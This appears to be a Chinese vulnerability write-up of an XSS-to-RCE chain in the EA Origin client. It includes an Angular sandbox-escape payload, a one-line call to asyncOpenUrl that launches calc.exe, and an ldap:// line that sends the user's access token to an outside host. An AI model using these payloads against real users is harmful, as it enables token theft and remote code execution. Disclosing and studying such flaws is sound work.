EA Origin Client Vuln - 从XSS到RCE

0x04 Bug#2 ：XSS

我们发现的是客户端模版注入，被限制只能在客户端执行。接下来我开始测试能够通过它执行JavaScript，从而窃取用户会话。

Angular有一个沙盒策略，因此我们得用一些时髦货来执行目标脚本。网上搜寻一番后，我找到了有关其沙盒逃逸的研究结果。

把下面这个payload放入title中，可以实现弹窗。

{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(l),a')}}

0x04 Bug#3 ：RCE

这部分的漏洞有些简单。QDesktopServices本身是不存在漏洞的，是Origin本身的问题。我找到了远程代码执行的方法。

阅读Qt文档，"QDesktopServices类提供了链接桌面服务的方法。桌面环境允许应用执行某些任务，例如以环境用户的默认浏览器打开一个网页"。

我发现了Origin暴露在外部的一个SDK接口，通过它使用JavaScript语句可以与QDesktopService通信。

访问DOM中的Origin.client.desktopServices，我发现了下面这些函数：

: function asyncOpenUrl()
: function asyncOpenUrlWithEADPSSO()
: function deminiaturize()
: function flashIcon()
: function formatBytes()
: function getVolumeDiskSpace()
: function isMiniaturized()
: function miniaturize()
: function moveWindowToForeground()
: function setNextWindowUUID()
: function showWindow()

有些函数非常有意思，例如flashIcon()，调用它后你会发现Origin图标开始闪动。大部分函数都是只能攻击应用本身，所以我不打算使用它们。

后来我们发现了asyncOpenUrl()函数。这个函数作用是调用QDesktopService的OpenUrl函数，被调用的函数会打开浏览器。OpenUrl函数可以打开注册了特定URL的应用（一般是浏览器），根据文档说明，使用该函数还可以加载某些资源。这听起来很有趣  ; )

然后我制作了下面这个JavaScript payload代码，成功弹出计算器：

Origin.client.desktopServices.asyncOpenUrl("calc.exe")

0x04 还能更进一步？

我前面已经提到过Origin存在一个CSP策略，使得提取数据更加困难。但我后来发现使用ldap://访问协议发送LDAP请求结合asyncOpenUrl()函数可以提取出想要的数据。

"ldap://safe.tld/o="+Origin.user.accessToken()+",c=UnderDog"

在服务器上开启tcpdump，设置过滤则可以看到以明文形式传递的数据。

此外Origin.user对象还包含其他函数：

: function accessToken()
: function country()
: function dob()
: function email()
: function emailStatus()
: function globalEmailSignup()
: function isAccessTokenExpired()
: function originId()
: function personaId()
: function registrationDate()
: function sessionGUID()
: function showPersona()
: function tfaSignup()
: function underAge()
: function userGUID()
: function userPid()
: userStatus()

这里我就不一一赘述这些函数的功能了，有兴趣自行实验。

0x05 关于补丁

电子艺术家已经推出了相关补丁，但我在推特上仍看到很多bypass的方法。补丁是失败的，这篇文章再次警示需要彻底清理用户的各种类型的输入。

转自先知社区